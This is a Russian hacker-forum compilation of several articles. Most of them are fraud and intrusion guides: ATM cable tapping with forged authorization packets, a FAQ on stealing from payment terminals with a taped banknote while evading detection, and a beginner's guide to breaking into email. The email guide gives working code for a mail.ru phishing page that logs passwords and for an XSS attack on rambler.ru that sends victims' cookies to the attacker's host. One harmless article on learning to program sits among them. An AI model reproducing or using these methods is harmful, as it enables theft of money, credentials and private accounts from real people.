Есть, но для этого потребуется умение держать паяльник в руках, чтобы смастерить себе некий хардваринговый девайс, а также разбираться в сетевых протоколах на канальном уровне. Идея проста до безобразия: поскольку банкомат в себе не хранит никакой информации и всегда обращается за ответом в банк, то можно, врезавшись в кабель между ним и банком, перехватить трафик и фальсифицировать его нужным нам образом. Ни один банк не в состоянии гарантировать целостность кабеля на всем его протяжении.

Разумеется, для анализа протокола обмена понадобится персональный компьютер, а также программа для снятия дампа и представления его в удобочитаемом виде. Можно, к примеру, воспользоваться компактной и маленькой утилитой pio и навигатором управления bleak_l, заботливо написанным хакером КРМС для взлома НТВ, но вполне подходящим и для этого случая.

Единственное, что придется спаять самостоятельно, так это контроллер для подсоединения к банковскому кабелю. В Сети очень много различных схем и энтузиастов, предлагающих за относительно небольшие деньги приобрести уже готовые изделия. Так или иначе, но в дальнейшем будем считать, что такой девайс у нас есть.

Приступаем к делу!

Ну вот. Обзаводимся ноутом, сниффером, шварцнегером и адвокатом на всякий случай

1. Врезаемся в линию между банкоматом и авторизационным центом (заметим, что врезаться придется в разрыв кабеля, так чтобы вы в дальнейшем могли не только перехватывать, но и блокировать любые проходящие пакеты). Разумеется, что если мы хотя бы на мгновение прервем целостность кабеля, дело закончится плачевно. Поэтому поищите в книжках электронные схемы мгновенной коммутации "на ходу". Аналогичным образом мошенники нейтрализуют сложные системы электронных сигнализаций. Не тех, что в магазинах, а на порядок совершеннее.
2. Наблюдаем за пересылкой пакетов, не предпринимая никаких действий. Только наблюдаем, чтобы понять логику. На самом деле это "только" представляет собой утомительный и кропотливый анализ протоколов и расшифровки всех полей заголовков пакетов с той целью, чтобы в дальнейшем иметь возможность генерации и отправки собственных пакетов, не опасаясь того, что они чем-то будут отличаться от реальных.
3. Теперь манипулируем легальной картой (это значит, что по крайней меру одну карту вы должны будете все же завести) с тем, чтобы понять логику обмена. В частности, найти и опознать передаваемые банкоматом запросы и возвращаемые ему ответы.
4. Сравним теперь это с просроченной картой, чтобы определить реакцию системы в такой ситуации, а также найти и идентифицировать коды ошибок (они нам потом понадобятся).
5. Наконец, тяпнем по маленькой для храбрости и, оставив Шварценеггера на шухере, начнем процесс. Засовываем нашу карту, на счету которой лежат оставшиеся после экспериментов с банкоматом несколько долларов.
6. Наблюдаем, как банкомат шлет запрос, включая номер нашего счета и все остальное. Мы никак не вмешиваемся в этот процесс.
7. Авторизационный центр должен вернуть ответ, в котором содержится много полезной информации. А среди нее - максимально возможная сумма для снятия. Вот тут мы перехватываем этот пакет и взамен него шлем другой Чем он отличается от оригинального, не стоит, наверное, даже говорить - и так всем ясно. Но будьте внимательны! Эта сумма может присутствовать сразу в нескольких полях, кроме того, необходимо скорректировать и поле контрольной суммы, иначе ничего не получится! Это самый сложный момент во взломе.
8. Впрочем, на этом этапе вы еще ничем не рискуете. Если ошибетесь, то просто перехватите обратный ответ банкомата и не пропустите его. Ведь вы еще помните коды ошибок, не так ли? А поэтому пробуйте, пока банкомат не "проглотит" фальсифицированный пакет.
9. Ну что же, теперь требуйте от банкомата столько денег, на сколько у вас хватит совести. В это время банкомат передает банку, сколько денег было снято. Взаправду. Эту информацию надо перехватить и послать ложный пакет, что денег снято всего 1 доллар (или сколько у вас там осталось взаправду на карточке). Будьте очень внимательны. Теперь фальсифицированный пакет передается уже банку, и любое неверное действие будет необратимо зафиксировано системой безопасности, и даже Шварценеггеру скоро покажется жарковато.
10. Ну вот и все. Осталась маленькая проблема - как обеспечить сходимость дебета и кредита. Ведь банкомат ведет логи и протоколы всех действий. Подумайте, как можно обмануть систему.
11. Наконец все! Вы отсоединяете свой ноутбук от кабеля, по возможности замаскировав нелегальное подключение, и отправляетесь в ближайший компьютерный салон за новым микропроцессором.
12. Однако помните, что многие банкоматы сейчас снабжены контрольными телекамерами, что не есть хорошо. Но к счастью, еще не все И стальная крыса всегда найдет для себя щель!

Послесловие

А вообще, чтобы ломать банкоматы, неплохо бы разобраться в их устройстве, типовом протоколе обмена и программном обеспечении То есть так или иначе выбрать себе работу, связанную с их разработкой, созданием или по крайней мере эксплуатацией В этом случае вы получите действительно достоверную информацию об их устройстве, а также слабых и сильных сторонах А ведь уязвимость у них действительно есть Только она неочевидна для постороннего, не работавшего с ними человека. Но как и любому человеческому творению, этому свойственны недостатки не в меньшем числе.

Ну, статья не моя, а тебе на слово я поверю). Слушай, а если я сниму с чужой кредитки 499 рублей - тогда будет считаться, что преступления не было?)

А разве нигде не фиксируется, сколько денег было на счету и сколько было снято? О_о

FAQ по многоразовой купюре (универсалке)

Автор статьи - DeaDevil с ][aker.ru

q) зачем мне многоразовая купюра (универсалка)?
a) для того чтоб использовать аппарат в целях пополнения баланса мобильного телефона, не тратя финансы

q) а как она выглядит ?
а) это обычная купюра высокого достоинства (100-5000 рублей) с наклееными по краям линиями скотча (они же шлейфы)

q) а какая длина у шлейфа?
а) 30 см - не прогадаешь.

q) скотч липнет к аппарату, что делать ?
а) не забывай , что за пределами купюры - скотч липнет сам к себе, так как он свёрнут вдвое !!!.

q) какие аппараты подходят для данного действия ?
а) а так сразу и не узнаешь - надо тестить.

q) как провести тест ?
а) необходимо использовать тестовую купюру, она выглядит как обычная купюра достоинством в 10 рублей с диагонально наклееным куском скотча с одной стороны купюры, хотя также возможно проводить тест с купюрой , на которой скотч с 2-х сторон.

q) а почему тестовая купюра должна выглядеть именно так?
а) да потомучто создатели аппаратов для пополнения счёта тоже не глупцы, в них давно присутствуют отражатели, тесты на края купюры, и многие другие подводные камни.

q) что если тестовая купюра не принялась ?
а) это говорит о том что в аппарате есть отражатель, попробуй использовать матовый скотч на универсалке, можешь налепить его на обычный сверху, так больше шансов вытащить купюру.

q) у меня принялась тестовая купюра, а универсалка выплёвывается, что это значит?
а) это значит , что в данной машинке стоит тест на края купюры, необходимо либо сделать надрезы у края, либо похитрить как на картинке...

q) а как не спалиться ?
а) есть техника безопасности, так как тебе на тест и пополнение счёта необходимо примерно 10-15 минут (а первый раз ещё боьше) - необходимо найти аппарат который собирает редко очередь более 2х человек и прийти к нему ночером , часика в 3-4...

q) а что если аппарат не принимает купюру даже с матовым скотчем ???
а) я предложу тебе забить на этот аппарат и искать другой, хотя меня бы он заинтересовал, я бы им плотно занялся и фрикнул. хотя сознаюсь ... фрикается не всё, не могу понять что там тест.(подозрения есть проведу тест - напишу)

q) а можно использовать нитки или леску ?
а) если ты гуру, можешь юзать хоть пылесос, я всего раз использовал леску, как результат - изорваный фиолет (500р, благо в банке приняли и поменяли)

q) если меня поймают я сяду ?
а) есть все шансы, мошенничество... как таковой статьи по фрикерству нету, но есть много статей куда попадает данное действие.

q) каждый день же идёт пересчёт купюр, спалят что моей не хватает и по номеру узнают что и где !!!
а) глупо, там лежит примерно 5к, половина из них 10рублёвки, и вдруг не хватает 500 рублей ... ну как возможно понять, что это именно ты ? подозреваемых сотни, а ещё возможен баг машины (лично видел как машина выплюнула купюру после того как тип оплатил и ушёл) . клади раз в месяц (2 месяца), и заведи несколько автоматов.

q) я вставил купюру без теста, а её зажевало и не отдаёт, чё делать в таком случае ?
а) надеюсь тебя твоё "без теста" чему-нибудь научит... ну чё, дёргай со всей силы шины на себя и иди оттуда (есть 3 варианта 1-купюра выдернется целой 2-рваная купюра 3-вырвется тока шина : 1-в карман 2-в банк на обмен 3-мвахахахаха)

q) а можно ли создать такую купюру, что будет подходить ко всем аппаратам ?
а) да можно, но это что-то ювелирное, я думаю что моя купюра почти стала таковой.

q) а можно оплачивать что-нибудь ещё, кроме телефона ?
а) хм... это вопрос достойный напряга мысли... думаю да, надо посмотреть. тестите, если прокатит - флаг в руки...

q) чем отличается тест-купюра со скотчем с одной стороны и с 2-х сторон ?
а) тем что можно найти положение отражателя относительно купюры одинарой клейкой и вообще обнаружить его наличие двойной.

Как стать программистом

Автор статьи - nerezus с forum.antichat.ru

Введение.
Эта статья не про выбор первого языка(несмотря на самый большой пункт тут).

1) А надо ли мне это?
действительно, советую хорошо подумать
Кто-то из KISS говорил примерно такое по смыслу "Если кто-то говорит, что он взял гитару и играет ради музыки, а не для того, чтобы заваливать телок, то это гон, можете плюнуть ему в лицо!" Тут заменяем телок на стабильные(хоть и небольшие) деньги, а музыку на кодинг =)

2) Для чего?
Собственно вопрос с подвохом. Ибо правильно ответят лишь немногие(и это будет совпадением).
А дело в том, что человек сам не знает, чего хочет. Да и как правило одним языком не заканчивается.

3) Определение первого языка для обучения. Эта часть займет около пары часов.
Есть 2 варианта: взять актуальный язык, либо язык типа паскаля или бейсика: которые не применяются.
Кто-то может возразить: мол Delphi или VB.NET. Разочарую их: Delphi и паскаль не имеют ничего общего кроме небольшого сходства в синтаксисе. Для VB.NET и BASIC оно и того меньше. И подходы в программировании абсолютно разные. Это все равно, что изучать C++, начав с книги по C. Но об этом поподробнее потом.
Однако хочу дать заранее совет: не стоит начинать с низкоуровневых вещей, т.к. при обучении программированию придется уделять не только алгоритму, но еще и работе с указателями, выделением памяти и прочими "вкусностями". Именно этим "страдают" C/C++/asm. Поэтому я бы не рекомендовал начинать с них - наверстать можно будет и потом(ну если конечно это будет нужно).
Итак, что у нас остается: Java, .NET(C#, VB.NET и подобные языки, распространено в основном в США), Delphi(только в бывшем СНГ, на общемировой арене это очень редкий зверь). и скриптовые языки: Python, Ruby, Perl. Так же существует PHP, однако для его изучения надо уже иметь теоретические(и желательно практические) знания о работе веба, многие этому не следовали, а что из этого получалось, можно узнать на phpclub.ru, посмотрев на тупейшие вопросы в основном разделе их форума).
Сам бы я посоветовал Python или бейсик. Кстати их объединяет одинаковая типизация: dynamic, strong. Кстати хочу заметить, что именно strong типизация позволит минимизировать количество логических ошибок.
Языки со strong-типизацией: Java, C++(именно C++, а не C), .NET языки, Python, basic, ruby, delphi. У C, Perl, PHP типизация weak(слабая).
Подробнее читать про конкретный язык в википедии(wikipedia.org).

4) Итак язык выбрали, с чего начинать?
С самого начала. По мере изучения языковых конструкций пробуем применять их на практике. это не сложный этап, однако именно на нем отсеивается большинство. И проблема с нехваткой материала для тренировок. Пример задачки(задача 1) можно увидеть в приложениях.

5) Допустим, выучили мы синтаксис.
Ну или почти выучили. Ведь некоторые языки типа бейсика, C, Pascal или Java можно выучить(имеется ввиду только синтаксис, причем без magic-фишек) очень быстро. Но вот научиться применять его - намного сложнее.
Эта часть похожа на изучение поведения сферического коня в вакууме. Потому что на примерах ее изучить практически нельзя. Отложим этот этап.
Итак, добро пожаловать в реальный мир!

6) Чем отличается реальная задача от задачи из задачника?
Правильно, тем, что она реальная. Для примера возьмем такую: написание программы для сортировки мейлов в файле. С графическим интерфейсом.
Что понадобиться знать? Работу с файлами, работу с GUI. Изучаем. Пишем. И перед нами уже начинает возникать проблема. Подробнее о ней немного дальше.
И именно на этом этапе начинаем изучать стандартные библиотеки языка/технологии. и не только стандартные.
Кстати, на этом этапе уже можно начинать зарабатывать. Однако качество продуктов будет хреновое
Решаем задачу 2(в приложениях).

7) Насчет проблем из пункта 5. Если работу с файлами можно сделать по принципам структурного подхода, то уже работа с GUI в этом стиле будет сплошным мучением. Итак, изучаем ООП. Именно практическую часть, т.к. в пункте 4 теория уже была выучена. Этап занимает достаточно много времени.
Именно по этой причине я не советовал начинать C++ с C, а Delphi с паскаля: переучиваться будет сложнее, чем начинать заново.
То есть учим теорию: ООП(нужно много практики), которая плавно перейдет в ООД, естественно надо будет знать паттерны, UML, принципы разработки и т.д.
Так же больше работаем на практике: регулярные выражения, работа с БД и SQL, GUI, сокеты, высокоуровневые протоколы, такие как HTML, FTP и всякие xmlrpc и SOAP, набор технологий XML и прочие.
Решаем задачу 3(на выбор).

8) Что дальше?
Совершенствуем свои навыки. Ты уже будешь сам знать, что тебе дальше делать.
P.S. Хочу заметить, что литературы на русском языке для тебя станет не хватать. Вообще. Так что знание английского обязательно. Именно обязательно, а не желательно.

И пару нюансов:
1) Практически для всех языком имеются свободные рабочие места. Ну кроме раритетных или специфических.
2) И вообще, если заказчику нужен готовый продукт, то ему, как правило, монопенисуально, на чем написан продукт.
3) У каждого языка своя направленность. Поэтому тупо применять к примеру PHP для написание клиентских приложений с GUI, а на ассемблере писать сайты или СУБД.
4) Заработок не зависит от языка/технологии, а только от уровня профессионализма.
5) А если занимаешься низкоуровневым программированием, то про ООП - не на твой счет.
6) Есть такое заблуждение: "Программист - это тот, кто умеет составлять алгоритмы". Так вот: умение составлять алгоритмы - требование обязательное, но не достаточное, на этом дальше 5 пункта(в этом обзоре) не уедешь.

Приложения:
Задача 1 (уровень: продвинутый школьник)
Старая задачка, обычно на школьных олимпиадах ее дают:
Имеется матрица (n*m) заполненная 1 и 0. Единицы - это острова, а нули - море. Если единицы находятся рядом по горизонтали или вертикали - то они образуют один остров. Найти количество островов.
P.S. Естественно могут быть "гнутые" и "дырявые" острова.
P.P.S. Как не странно, но решают ее редко, хотя она достаточно легкая.
Задача 2 Написать аналог wget.
Задача 3A Написать BB-парсер. Естесвенно не тупой подстановкой регекспов.
Задача 3Б Интерпретатор/HTTP-сервер/etc на выбор.

Взлом e-mail для новичков

Автор статьи - dadevil с forum.antichat.ru

Внимание! Содержимое данной статьи предоставляется исключительно для ознакомительных целей! Автор не несет никакой ответственности за Ваши действия и за последствия от Ваших действий.

Несколько способов взлома e-mail аккаунтов

Здравствуйте! Я Drum'and'Bass(dadevil). Сегодня я опишу Вам несколько способов того, как производится взлом e-mail, и как себя защитить от взлома. Я уверен, что на различных сайтах и форумах Вы видели, что люди рекламируют свои услуги взлома всяческих аккаунов. Это могут быть и почтовые аккаунты, и страницы социальных сетей, и игровые персонажи и самые разнообразные учетные записи на других сайтах. Хочется также заметить, что довольно часто мы видим в форумах такие темы и сообщения, как “Помогите взломать e-mail девушки” и т.п.

Как происходит вскрытие почты? Для начала я скажу, что есть несколько способов сделать это:

Взлом почты с помощью фейков. Фейк — это точная подделка страницы авторизации на некотором сайте, в которой пользователь введет свои данные и они запишутся в Вашей базе. Способ заключается в том, что мы сначала подделываем страницу авторизации сайта, пишем несколько PHP скриптов, потом закачиваем созданные файлы к себе на хостинг (можно использовать бесплатный) и отсылаем нашу ссылку жертве. Открывая ссылку, жертва “авторизируется”, и тем самым передает нам свой логин и пароль, которые записываются в нашу базу. Данный способ срабатывает в 60% случаев. Жертва не всегда ведется на то, что бы ввести логин и пароль в нашу подделку. Она может обратить внимание на адрес страницы. Естественно, он будет отличаться от настоящего сайта. Сейчас этот способ не теряет свою актуальность. Он очень часто и широко используется при вскрытии любых аккаунтов.
Взлом почты с помощью XSS-уязвимостей. Данный способ срабатывает приблизительно в 90-95% случаев. Этот способ заключается в использовании XSS уязвимостей сайта. Он намного эффективнее, и жертва даже не всегда понимает, что её логин и пароль уже отправился в Вашу базу данных. Это и не удивляет. Жертва открывает Вашу ссылку, и после загрузки, или даже во время загрузки страницы, выполняется специальный JavaScript код, благодаря которому Вы получаете cookies от необходимого Вам сайта (Что такое cookies и какую пользу можно от них получить, читайте ниже). Данный способ вскрытия аккаунтов используется очень часто, и самое главное, что на него легко можно повестись, даже не подозревая об этом.
Взлом сервера. Самый сложный и наименее используемый способ. В этой статье он рассматриваться не будет.

Для начала я объясню Вам, что такое cookies. Cookies (кукисы) — это специальные переменные, которые устанавливаются браузером, при получении специальной команды от сервера, для определенного сайта, который Вы когда-то посетили. Они сохраняются в пользователя на компьютере. Давайте посетим какой-нибудь сайт. К примеру, http://google.com. Открыли? Теперь в адресной строке, в этом самом окне наберите такой JavaScript код:

javascript:document.cookie

Нам откроется страница с непонятным содержимым. На самом деле, это и есть cookies, который нам установил сайт google.com. Переменные cookies записываются в формате name=value (имя=значение) и разделяются с помощью символа “;”.

Я написал Вам основную информацию о том, какие способы взлома аккаунтов существуют. Теперь я Вам детально попытаюсь объяснить, как работает, и как реализуются первый и второй способа вскрытия (взлом с помощью фейков и взлом с помощью XSS уязвимостей).

1) Взлом почты с помощью фейков

В этом разделе я расскажу, как взломать почту с помощью фейков. Для начала, нам нужно зарегистрировать бесплатный хостинг с поддержкой PHP. В данном примере, я использую http://hostland.su. Регистрация займет у Вас всего пару минут, и еще после регистрации пару минут придется подождать, пока на Вашу почту придет письмо для подтверждения регистрации. После этого можно приступать.

Сначала я расскажу Вам, как именно делаются фейки.
Давайте сделаем фейк для популярного почтовика http://mail.ru. (Будем использовать браузер Mozilla Firefox 3)

Открываем ссылку http://win.mail.ru/cgi-bin/login, так как именно она есть страницей авторизации. Жмем правую кнопку на теле документа. В контекстном меню выбираем опцию “Исходный код страницы”. Выделяем весь код страницы, копируем в буфер обмена, и вставляем в любой текстовый редактор (Скажем, Блокнот). Далее, мы будем работать только с текстом в окне редактора. Для начала ищем слово “Войти”, потому что в нашем случае именно так подписана кнопка авторизации.

Нашли?

Теперь посмотрите на часть кода, которая находиться между тегами <form> и </form>, и которая включает в себе найденный нами фрагмент “Войти”. Данная часть исходного кода страницы отвечает за отправку данных, введенных в форму на сайт. Вот, как она у меня выглядит:

<form method="post" action="auth" onSubmit="return CheckForm(this);"> <input type="hidden" name="page" value=""> <input type="hidden" name="post" value=""> <input type="hidden" name="login_from" value=""> <tr> <td><img src=http://img.imgsmail.ru/0.gif width=55 height=1><br>Имя</td> <td width=63%><input type="text" name="Login" value="charm0nt" class=w_100></td> <td width=37%><select class=w_100 name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select></td> </tr> <tr> <td>Пароль</td> <td colspan=2> <table width=100% cellpadding=0 cellspacing=0 border=0><tr> <td width=100%><input type="password" name="Password" class=w_100></td> <td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.mail.ru/pages/help/2.html#2185" target=_new>Забыли&nbsp;пароль?</a></td> </tr></table> </td> </tr> <tr> <td>&nbsp;</td> <td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td><input type="Submit" value=" Войти " style="margin-top:4px"></td> <td>&nbsp;</td> </tr></form> Давайте обратим внимание на первую строчку кода: <form method="post" action="auth" onSubmit="return CheckForm(this);">

Эта строчка указывает, куда мы отправляем данные. Данные у нас отправляются на скрипт “auth” (action="auth"). Полный путь к скрипту выглядит так: http://win.mail.ru/cgi-bin/auth. В нашей фейковой странице, мы должны заменить только ту строчку, куда идет отправка данных. В нашем случае, мы будем отправлять данные на наш заранее подготовленный PHP скрипт. Следовательно, заменяем строчку

<form method="post" action="auth" onSubmit="return CheckForm(this);">

на

<form method="post" action="log.php" onSubmit="return CheckForm(this);">

Улавливаете разницу? Теперь форма будет обращаться к log.php. Сохраните отредактированный файл под именем index.htm.

Давайте приступим к написанию скриптов.

Напишем log.php с таким содержимым:

<?PHP $Login = $_POST['login']; // Читаем логин $Domain = $_POST['domain']; // Домен $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $Pass = $_POST['password']; // Пароль $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Мыло:$Login@$Domain Пасс:$Pass"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"\n $text \n"); // Записываем fclose($filelog); // Закрываем header('Location: http://win.mail.ru/cgi-bin/login'); // Переводим жертву на // указанный адрес ?> Этот скрипт будет получать данные и сохранять их на хосте в нашей базе данных - base.php. Напишем код для файла base.php: <?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?>

Если кто то перейдет из браузера по адресу -- то ему отобразится страница с содержимым “Доступ к базе закрыт!!!”, но если Вы этот файл скачаете с хоста к себе на компьютер, и откроете с помощью текстового редактора, то сможете посмотреть полное его содержимое.

Теперь нужно залить наши файлы на хост. Для этого можно воспользоваться программой Total Comander. Я также хочу заметить, что для загрузки файлов на FTP сервер можно воспользоваться и другими программами.

После того, как Вы подтвердили регистрацию на сайте http://hostland.su (и вообще на любом другом сайте, который предоставляет бесплатные хостинги), Вам должны были прислать письмо, в котором написаны все данные для доступа к новому аккаунту.

Данные для доступа по FTP выглядят примерно так:

host: ftptu2.ru
user: username
password: password
Как использовать эти данные? Очень просто! Я покажу Вам это на примере работы с Total Comander. Другие программы настраиваются по такому же принципу. Для начала запускаем Total Comander.

Вызываем команду FTP => Соединится с FTP сервером…

Теперь нажимаем кнопку “Добавить”, вписываем нужные данные, и жмем “ОК”.

После того, как Вы все правильно сделаете, выполните команду FTP => Соединится с FTP сервером…, выберете только что созданное Вами подключение и нажмите копку “Соединится”. Заливать файлы на хост также просто, как и копировать их на локальный диск. В письме от поставщика услуг (в данном случае — http://hostland.su), должно быть написано, куда можно закачивать файлы. В нашем случае, файлы можно заливать в папку /htdocs/www.

Загрузим все заранее подготовлены нами файлы (index.htm, log.php, base.php) в эту папку.

Сделали? Теперь откройте любой интернет браузер и перейдите по адресу Вашего сайта. Фейк работает. Введите произвольные значения полей “Логин” и “Пароль” и нажмите кнопку “Войти”. Нужно заметить, что после этого браузер перейдет по адресу http://win.mail.ru/cgi-bin/login, а именно его мы указывали в файле log.php.

Теперь из своего хоста загрузите на компьютер файл base.php и откройте его в любом текстовом редакторе. Если появилась новая запись в которой есть точно введенные Ваши данные — значит, поздравляю, Вы все сделали правильно!

2) Взлом почты с помощью XSS-уязвимостей

В этом разделе я расскажу, как взломать почту с помощью XSS уязвимостей. Что такое XSS уязвимость?

Аббревиатура XSS расшифровывается как Сross Site Sсriрting (“межсайтовый скриптинг”). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других.

РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом:

http://www.somesite.com/index.php?fi... … mp;third=3

Тут http://www.somesite.com/index.php — некая страница, к которой мы обращаемся, а first=1&second=2&third=3 — это переменные, передаваемые скрипту. В GET-запросе переменные записываются следующим образом:

имя_переменной_1=значение_переменной_1&имя_перемен ной_2=значение_переменной_2&…&имя_переменной_n=зна чение_переменной_n

То есть для наглядности примера, запишем еще один GET-запрос:

http://www.somesite.com/index.php?им...е_переменной_n

PHP-скрипт может генерировать html-страницу, в которой выводит значение одной из переданных переменных без всякой фильтрации. НО! Если Вы, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, <sсriрt> или <br>), то они выполнятся интерпретатором!

XSS-уязвимости используются в большинстве случаев для кражи кукисов (сookies в большинстве случаев хранят сессию, присвоив себе которую, можно быть на сайте под чужим аккаунтом. Также они хранят зашифрованный пароль, расшифровав который, можно завладеть аккаунтом). Но XSS-баги не ограничиваются кражей сookies.

Что же позволяют осуществить XSS-уязвимости?

Кражу конфиденциальной информации посетителя.
Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты.
Непредусмотренные стандартом возможности браузера. (Благодаря уязвимостям в самых браузерах)

В следующем примере я буду использовать браузер Internet Explorer 7. (В этой части статьи будет множество всяких ссылок; эти ссылки нужно вводить либо вручную, либо копировать в буфер обмена и вставлять в браузер; никак иначе я не советую, потому что CTRL + клик по ссылке может не правильно отобразить страницу)

Рассмотрим сайт http://rambler.ru. Воспользуемся поиском сайта. Введем произвольный поисковый запрос, например, “Hollywood” и нажмем кнопку “Найти!”. В результате поисковик выдаст множество сайтов, но внимание мы обратим на адрес страницы в браузере.

В меня она выглядит вот так:

http://nova.rambler.ru/search?btnG=%...uery=Hollywood

Теперь договоримся, что для поиска XSS-уязвимостей будем использовать следующий JavaScript код:

<script>alert("XSS")</script>

Данный код выводит сообщение с текстом “XSS”. Попробуем ввести в поисковую строку этот JavaScript код. Откроется страница с некоторым адресом и с обычным для поисковика содержимым. Но обратим внимание на заголовок окна. У меня он выглядит так:

Rambler: поиск по Интернету. '<script>alert("XSS")</script>' — Windows Internet Explorer

Давайте посмотрим исходный код страницы, в котором найдем первое совпадение со строчкой “<script>alert("XSS")</script>”, то есть строчкой, которую мы ввели в качестве поискового запроса. Нашли? Она должна находиться между HTML тэгами <title> и </title>, которые и отвечают за текст заголовка окна браузера. У меня все это выглядит вот так:

<title>Rambler: поиск по Интернету. '<script>alert("XSS")</script>'</title>

А теперь представим, что случиться, если мы тэг </title> разместим перед нашим скриптом. Получился бы код:

 </title><script>alert("XSS")</script>

<title>Rambler: поиск по Интернету. '</title><script>alert("XSS")</script>'

который интерпретатор выполнит, поскольку не происходит фильтрации символов, о которых я писал раньше. Но как этого достичь? Оказывается, что очень просто! Давайте введем в поисковую строку такой запрос:

</title><script>alert("XSS")</script>

то есть сами попытаемся закрыть тэг </title>. Как это ни странно, но JavaScript код выполнился, и мы видим результат:

Неплохо, правда? Снова смотрим на адрес страницы. Так он выглядит у меня:

http://nova.rambler.ru/search?btnG=%...3C/script>

Тут переменная query содержит необходимый нам поисковый запрос, то есть строку “</title><script>alert("XSS")</script>” в зашифрованном виде. Помните, как первый раз мы ввели строку “Hollywood” в качестве поискового запроса? Тогда адрес страницы выглядел так:

http://nova.rambler.ru/search?btnG=%...uery=Hollywood

Видим, что query=Hollywood, что и подтверждает мои слова.

Перейдем по ссылке:

http://nova.rambler.ru/search?btnG=%...и!&amp;query= </title><script>alert("XSS")</script>

И снова видим окошко с текстом “XSS”. Давайте попробуем “опустить” переменную btnG, то есть просто удалим её из адреса страницы, и посмотрим, будет ли работать скрипт. Откроем ссылку:

http://nova.rambler.ru/search?query=< … t>alert("XSS")</script>

Работает!

Только что мы с Вами вывели XSS-уязвимость в сайте wwwrambler.ru. Она присутствует потому, что не происходит фильтрации спецсимволов, и мы можем закрыть тэг <title>, что бы выполнился наш код.

3) Использование XSS-уязвимостей

Как же использовать XSS-уязвимости?

Выше я написал, что XSS-уязвимости чаще всего используются для того, что бы получить cookies жертвы. Давайте с помощью найденной уязвимости на Рамблере, подсмотрим наши кукисы. Для этого выполните следующий JavaScript код: (код document.cookie возвращает cookies сайта)

<script>alert(document.cookie)</script>

То есть, откроем страницу

http://nova.rambler.ru/search?query=< … t>alert(document.cookie)</script>

Мы видим непонятный текст в окошке сообщения. Этот текст и есть наши cookies! Как я раньше писал, они выводятся в формате имя=значение и разделяются “;”.

А что будет, если мы получим кукисы жертвы? Давайте представим такой случай: жертва зашла в свою почту на Рамблере, читает входящие письма. Тут она видит Ваше сообщение, в котором Вы пишете, что нашли прикольный сайт! Заходи! Она переходит по Вашей ссылке… и действительно попадает на какой то сайт. На самом же деле, кукисы уже в нас. Теперь достаточно зайти под браузером, который разрешает редактировать кукисы (например, Opera), и подставить кукисы жертвы, вместо своих. После этого нужно нажать кнопку “Обновить”, — и мы увидим почту жертвы вместо своей J.

Как подставить чужие cookies вместо своих в Opera? Очень просто! Достаточно выполнить команду Инструменты => Настройки… и во вкладке “Дополнительно” выбрать пункт “Cookies”. Теперь, в окошке, что появится, выбираем соответствующие имена кукисов, жмем кнопку “Изменить” и заменяем их соответствующими значениями.

Можете провести эксперимент: зарегистрируйте два почтовых аккаунта на одном и том же почтовом сервере, посмотрите кукисы одного из них и сохраните во временном текстовом файле. Теперь зайдите под вторым аккаунтом, отредактируйте новые кукисы старимы значениями из текстового файла, и нажмите “Обновить”. Мы снова окажемся в первом аккаунте.

Как можно реализовать то, что бы при переходе по ссылке мы получали кукисы того, кто перешел? Очень просто. Помните, как мы учились делать с Вами фейк? Вот теперь нужно создать те же 3 файла, только с немного другим содержимым. Файл base.php должен быть точно таким, как и при создании фейка, а вот код для файла log.php придется переписать немного:

 <?PHP $Cookies = $a; // Читаем переменную a из // GET-запроса, в которой // будут кукисы $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Cookies:$Cookies"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"\n $text \n"); // Записываем fclose($filelog); // Закрываем header('Location: http://somesite.ru'); // Переводим жертву на // указанный адрес ?>

В этом коде мы будем получать кукисы с помощью GET-запроса через переменную “a”, и записывать их в файл.

Как же нам отправить GET-запрос с кукисами на наш скрипт? Тут нету совсем ничего сложного!!! Создадим файл js.js с таким содержимым:

var concat = function() { var args = Array.prototype.slice.call(arguments); return args.join(""); } a = "http://www.your_site.com/log.php?a="; b = document.cookie; location.href = concat(a, b); В этом JavaScript коде нет ничего сложного. Внимание нужно обратить только на эту строчку: a = "http://www.your_site.com/gate.php?a=";

Тут должен быть полный путь к нашему log.php файлу, и еще + строка “?a=”. Благодаря этому мы дописываем до строки переменную “a” со значением document.cookie. Последняя строка

location.href = concat(a, b);

Пересылает данные нашему скрипту, который записывает кукисы в базу данных.
Теперь нам нужно сделать файл index.htm с таким содержимым:

<html> <body> <script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"</script> </body> </html>

Все 4 файла (index.htm, js.js, log.php, base.php) мы должны залить в одну директорию нашего хостинга. При переходе по нашей ссылке -- и при условии, что все эти файлы будут в корневом мы получим cookies жертвы к сайту http://rambler.ru. Если Вы хотите, что бы файлы не находились в корневом каталоге Вашего сайта, то нужно будет немного изменить код (вместо -- прописать полную ссылку к файлу).

